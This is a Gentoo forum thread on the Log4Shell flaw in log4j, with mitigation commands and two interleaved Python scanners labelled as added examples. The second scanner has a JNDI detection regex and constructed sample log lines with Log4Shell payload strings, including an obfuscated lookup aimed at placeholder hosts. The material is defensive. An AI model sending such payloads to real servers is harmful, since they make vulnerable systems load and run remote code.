Gentoo Forums

Log4J2 CVE-2021-44228
halcon
l33t

Joined: 15 Dec 2019
Posts: 629

PostPosted: Tue Dec 14, 2021 8:51 pm    Post subject: Log4J2 CVE-2021-44228

I see nobody has posted this yet...

An important security vulnerability in Log4J2, recently discovered, can affect a lot of applications:

https://github.com/NCSC-NL/log4shell/tree/main/software
_________________
A wife asks her husband, a programmer:
- Could you please go shopping for me and buy one carton of milk, and if they have eggs, get 6?
He comes back with 6 cartons of milk.
- Why did you buy 6 cartons of milk?
- They had eggs.
Arctic5824
n00b

Joined: 04 Dec 2021
Posts: 23

PostPosted: Thu Dec 16, 2021 1:23 am

The only real way to prevent this is for Java applications to update the log4j version used, if they are using an outdated version, as a fix has already been published.

Some claim "Java newer than 8 is safe from any RCE regarding log4j", but this is simply not true.
halcon
l33t

Joined: 15 Dec 2019
Posts: 629

PostPosted: Sat Dec 18, 2021 8:46 am

At least one vendor is completely unaffected :)

https://forum.mikrotik.com/viewtopic.php?t=181257#p897948
fedeliallalinea
Administrator

Joined: 08 Mar 2003
Posts: 30842
Location: here

PostPosted: Sat Dec 18, 2021 10:08 am

For the old version 1.2.17 (which is an end-of-life version) it is recommended to remove JMSAppender and SocketServer:
Code:
$ zip -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class
$ zip -d log4j-1.2.17.jar org/apache/log4j/net/SocketServer.class

_________________
Questions are guaranteed in life; Answers aren't.
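The post above removes two classes from a log4j 1.2.17 jar by hand. As an added example (not code from the thread or from the log4j project), the following script inventories a directory tree for archives that still contain those two entries, plus the log4j-core 2.x JndiLookup class that Apache's advisory for CVE-2021-44228 says to delete where an upgrade is impossible (a known mitigation assumed here, not something the thread states). Nested jars inside fat jars and wars are descended into; the sample archives are constructed in memory.

```python
import io
import zipfile
from pathlib import Path
from typing import Dict, List

# Entries whose presence marks an exposed component: the two log4j 1.x classes
# named in the post above, plus the log4j-core 2.x JndiLookup class that the
# Apache advisory for CVE-2021-44228 says to delete from jars that cannot be
# upgraded (a known mitigation, not something stated in the thread).
RISKY_CLASSES = (
    "org/apache/log4j/net/JMSAppender.class",
    "org/apache/log4j/net/SocketServer.class",
    "org/apache/logging/log4j/core/lookup/JndiLookup.class",
)

def risky_entries(jar_bytes: bytes) -> List[str]:
    """Risky entries in an archive given as bytes. Nested archives (a shaded
    log4j inside a fat jar or war) are descended recursively and reported
    as 'outer.jar!inner/path.class'."""
    found = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name in RISKY_CLASSES:
                found.append(name)
            elif name.endswith((".jar", ".war", ".ear")):
                found.extend(f"{name}!{hit}" for hit in risky_entries(zf.read(name)))
    return found

def scan_tree(root: str) -> Dict[str, List[str]]:
    """Map each archive under root to the risky entries it contains."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in (".jar", ".war", ".ear"):
            try:
                hits = risky_entries(path.read_bytes())
            except zipfile.BadZipFile:
                continue  # not a zip at all; skip rather than abort the scan
            if hits:
                report[str(path)] = hits
    return report

def build_sample_jar(entries: Dict[str, bytes]) -> bytes:
    """Constructed test data: an in-memory archive from {entry_path: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry, content in entries.items():
            zf.writestr(entry, content)
    return buf.getvalue()
```

Calling scan_tree on a deployment root (for example /opt) returns a path to entries mapping; an empty mapping means none of the listed classes were found, not that the installed version is current.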
technotorpedo
Apprentice

Joined: 10 Dec 2019
Posts: 151

PostPosted: Sat Dec 18, 2021 4:50 pm

Gotta rant a bit:

This makes me feel like wrapping at least 1, possibly 2, rolls of metal foil around my head. Still trying to wrap my mind around this affair. I mean yeppers .. obviously serious, though oddly the more I research this topic, the less I understand it, as I think the web is flooded with clickbait by people who have no or very little idea what they're typing about, so they can't clearly explain it to others. They just want to attract as many eyes with as much sensationalized web content as they can crap out ...

My personal install(s) are safe enough ... errrr possibly, I guess; I quit using Java plugins long before browser makers discontinued the practice, same for having anything JDK/JRE/etc. installed, though it is mind boggling to think about all the ways this could still impact everybody online. The fate of the free (technological) world can boil down to one of the 2 most popular logging frameworks for Apache/Java, that's maintained by a handful of volunteers; the web said the 3 (UNPAID) maintainers of log4j2 have been scrambling non-stop to get patches out, and the project page on apache.org shows there's 10 people with commit privileges for the codebase, no doubt also volunteers ...

Yet despite some big, big names in technology utilizing this, for a VERY long time, in a vast amount of applications, it's been around this long undiscovered? Honestly I am assigning this event to more NSA/Snowden type activity; while I do get such things can happen, I think they often have some help in happening for real. I mean, silver lining, it's drawing attention to vital open source projects being horribly underfunded etc. etc. Though if the scope and seriousness of such an exploit is to be believed then yeah, kind of numbing overall.

Of course I have seen people jumping on the opportunity to bash open source, yet again ... more than a few techno-giants widely used and missed this exploit, so they can't put it off on open source. Any people/techies here with a real grasp of this topic want to share your insights, how much is hype and overblown and how much of what's being said is for real? Ah ... not going to waste the foil but would appreciate hearing from better qualified techies and your views about this ...
Arctic5824
n00b

Joined: 04 Dec 2021
Posts: 23

PostPosted: Sun Dec 19, 2021 1:10 am

technotorpedo wrote:
how much is hype and overblown and how much of what's being said is for real?

I've been programming Java for 2-3 years; here is what I know.

Tons of apps still have RCEs. RCEs mean an attacker can run whatever code they want on exploited systems; this is massive. Lots of apps are patched now, but not all.

Most forms of this are server-side; this means users aren't directly affected. In some situations, like Minecraft, users were directly affected (attackers could put malware on their computer or whatever they want).

Recently a new exploit was found to bypass the patch; this mess is happening all over again, but this time silently with quick fixes. Some fixes don't need to be patched (such as cleaning log text instead of just updating log4j).

I've tested this exploit (of course in situations where I have permission); it's as the media describes it :/
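Arctic5824 mentions fixes that clean log text rather than patching, and that the attack rides on what gets logged. As an added example that is not code from the thread, here is a small defender-side scanner that flags log lines carrying a JNDI lookup, first unwrapping the lower/upper lookup nesting that public detection rules also handle; it reports the scheme so a responder can triage. The access-log lines and .invalid hosts are constructed.

```python
import re
from typing import Iterator, List, Tuple

# log4j 2.x substitutes "${...}" lookups inside logged messages; a logged
# "${jndi:<scheme>:...}" from untrusted input is what CVE-2021-44228 abuses.
# Public detection rules also unwrap case lookups such as "${lower:j}" that
# spell the token indirectly, so the scanner normalises those first.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)

def normalise(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lower/upper lookups until the text stops changing.
    The round limit bounds the work done on adversarial input."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        if new == text:
            break
        text = new
    return text

def jndi_hits(line: str) -> List[str]:
    """Scheme of every JNDI lookup in a line after normalisation ([] = clean)."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(normalise(line))]

def scan_log(lines) -> Iterator[Tuple[int, List[str], str]]:
    """Yield (line_no, schemes, line) for lines carrying a JNDI lookup."""
    for n, line in enumerate(lines, 1):
        hits = jndi_hits(line)
        if hits:
            yield n, hits, line

# Constructed sample access-log lines (not real traffic); hosts use .invalid.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [19/Dec/2021:01:10:00 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [19/Dec/2021:01:10:03 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [19/Dec/2021:01:10:09 +0000] "GET / HTTP/1.1" 404 "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.8 - - [19/Dec/2021:01:10:12 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.80"',
]

if __name__ == "__main__":
    for n, schemes, line in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: jndi via {','.join(schemes)}: {line}")
```

A hit means the string reached the log, not that the lookup was evaluated; whether it was depends on the log4j version and configuration of the process that wrote the line.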
technotorpedo
Apprentice

Joined: 10 Dec 2019
Posts: 151

PostPosted: Sun Dec 19, 2021 3:22 am

Thanks for sharing your feedback on this mess ... Been up/down/sideways, with this and other junk. I am not some Nix ninja or IT wizard; I am an end user who's happiest roaming around the web and dorking with GNU/nix, probably too much. Though is there any such thing as too much dorking with Linux? Really, who am I kidding; mulling over this type of subject matter, I am pissed off and in a very foul mood. Time for a movie or something ...